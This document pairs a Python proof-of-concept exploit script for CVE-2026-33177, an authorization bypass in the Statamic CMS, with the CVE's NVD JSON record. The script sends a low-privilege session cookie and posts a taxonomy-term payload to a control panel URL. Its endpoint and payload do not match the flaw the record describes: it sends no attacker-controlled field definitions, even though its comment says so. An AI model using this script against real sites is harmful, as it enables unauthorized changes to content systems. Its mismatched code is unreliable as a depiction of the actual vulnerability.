CVE-2026-33177

import requests # Target URL example (adjust based on actual installation) target_url = "https://example.com/cp/collections/taxonomies/terms" # Attacker's session cookie (low-privilege user) session_cookie = "statamic_session=low_priv_user_session_token" # Headers headers = { "Content-Type": "application/json", "Cookie": session_cookie, "X-Requested-With": "XMLHttpRequest" } # Payload exploiting the field action processing endpoint # Bypassing standard authorization checks by using controlled field definitions payload = { "action": "create", "fields": { "title": "Malicious Term", "slug": "malicious-term" }, "taxonomy": "categories" } try: response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Taxonomy term created.") print("[+] Response:", response.text) else: print("[-] Exploit failed. Status code:", response.status_code) except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-33177", "sourceIdentifier": "[email protected]", "published": "2026-03-20T22:16:29.117", "lastModified": "2026-03-23T18:45:27.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.14 and 6.7.0, low-privileged Control Panel users could create taxonomy terms by submitting requests to the field action processing endpoint with attacker-controlled field definitions. This bypasses the authorization checks enforced on the standard taxonomy term creation endpoint. This has been fixed in 5.73.14 and 6.7.0."}, {"lang": "es", "value": "Statamic es un sistema de gestión de contenido (CMS) impulsado por Laravel y Git. Antes de las versiones 5.73.14 y 6.7.0, los usuarios del Panel de Control con bajos privilegios podían crear términos de taxonomía enviando solicitudes al endpoint de procesamiento de acciones de campo con definiciones de campo controladas por el atacante. Esto elude las comprobaciones de autorización aplicadas en el endpoint estándar de creación de términos de taxonomía. Esto ha sido corregido en 5.73.14 y 6.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.73.14", "matchCriteriaId": "23CF5975-D5BE-4138-AE2F-95F7BBE00F20"}, {"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.7.0", "matchCriteriaId": "6B99B257-0FC1-4CF9-B006-8AEC17235BC8"}]}]}], "references": [{"url": "https://github.com/statamic/cms/security/advisories/GHSA-wh3h-gvc4-cc2g", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}